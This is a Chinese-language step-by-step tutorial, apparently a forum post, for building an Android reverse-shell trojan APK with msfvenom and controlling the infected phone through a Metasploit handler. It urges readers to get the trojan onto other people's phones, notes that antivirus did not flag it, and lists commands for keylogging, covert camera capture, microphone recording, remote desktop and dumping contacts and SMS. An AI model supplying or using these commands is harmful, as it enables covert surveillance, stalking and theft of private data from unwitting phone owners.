行动开始
先查看kali的ip,我的是1.114
然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
5555是设置的端口,可以自己更改 显示这个说明已经生成成功了
然后启动msf:msfconsole 然后输入命令:
1.use exploit/multi/handler //加载模块
2. set payload android/meterpreter/reverse_tcp //选择Payload
3.show options //查看参数设置
这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置
1.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
3.exploit //开始执行漏洞 开始监听,等待手机上线
靠自己发挥把木马安装到别人手机上,我这里测试就用自己的手机安装上了
安装过程360全程无提示~
红色框出的地方就说明手机上线了 然后可以输入sysinfo 查看手机信息
webcam_list 查看手机有多少个摄像头 这里显示是2个
keyscan_start:开始键盘记录
keyscan_dump:下载键盘记录
keyscan_stop:结束键盘记录
record_mic:录制声音(如果目标主机上有话筒的话)
webcam_chat:查看摄像头接口
webcam_stream //开启摄像头
webcam_list:查看摄像头列表
webcam_snap //隐秘拍照功能
webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的
run vnc:开启远程桌面
dump_contacts //导出电话号码
dump_sms //导出信息
可以输入?查看更多命令